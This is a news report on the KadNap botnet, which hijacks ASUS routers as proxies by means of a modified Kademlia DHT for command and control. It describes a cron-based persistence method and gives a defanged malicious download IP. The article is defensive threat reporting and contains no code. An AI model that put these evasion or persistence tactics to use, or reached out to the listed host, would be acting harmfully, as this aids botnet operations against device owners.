A newly identified botnet malware known as KadNap is specifically targeting ASUS routers and other edge networking devices, transforming them into proxies for malicious cyber activities. Since its emergence in August 2025, KadNap has reportedly compromised approximately 14,000 devices, forming a peer-to-peer network that communicates with a decentralized command-and-control (C2) infrastructure utilizing a customized version of the Kadmelia Distributed Hash Table (DHT) protocol.
The unique architecture of KadNap complicates efforts to identify and dismantle its C2 servers. Each node within the network manages a portion of the overall data, making traditional tracking methods ineffective. According to researchers at Black Lotus Labs, the threat research division of Lumen Technologies, nearly half of the KadNap network links to C2 infrastructure specifically designed for ASUS-based bots, while the remaining nodes interact with two separate control servers.
Significantly, the majority of infected devices are located in the United States, accounting for approximately 60% of total infections, followed by notable percentages in Taiwan, Hong Kong, and Russia. The infection process begins when devices download a malicious script from the IP address 212.104.141[.]140, which establishes persistence through a cron job that executes every 55 minutes. The main payload, an ELF binary known as kad, installs the KadNap client, which then identifies the host’s external IP address and retrieves the current time and system uptime from multiple Network Time Protocol (NTP) servers.
KadNap’s evasion tactics include the use of a modified Kademlia-based DHT protocol that helps obscure the IP addresses of its infrastructure within a peer-to-peer system. As noted by Black Lotus Labs, “KadNap employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol, which is used to conceal the IP address of their infrastructure within a peer-to-peer system to evade traditional network monitoring.” This sophisticated method allows infected devices to connect seamlessly to the C2 servers while complicating detection efforts for cybersecurity defenders.
Despite its decentralized nature, researchers found that KadNap’s implementation of Kademlia is weakened by a consistent connection to two specific nodes prior to reaching the C2 servers. This dependency on fixed nodes reduces the potential decentralization of the protocol, enabling more straightforward identification of the control infrastructure.
Furthermore, the KadNap botnet is linked to the Doppelganger proxy service, believed to be a rebranding of the Faceless service, which was previously associated with the TheMoon malware botnet. Doppelganger markets access to infected devices as residential proxies, facilitating malicious activities such as launching distributed denial-of-service (DDoS) attacks, conducting credential stuffing, and executing brute-force attacks—all of which can exploit KadNap victims.
In response to this emerging threat, Lumen Technologies has taken proactive steps to mitigate the impact of the KadNap botnet. As of the publication date, the company reported that it had “blocked all network traffic to or from the control infrastructure.” While this disruption is limited to Lumen’s network, the organization plans to release a list of indicators of compromise to assist other entities in addressing the botnet on their systems.
The rise of the KadNap botnet underscores the ongoing challenges in cybersecurity, particularly regarding the security of home networking devices. As cybercriminals continue to evolve their tactics, vigilance and updated security measures become increasingly essential for both individuals and organizations alike.
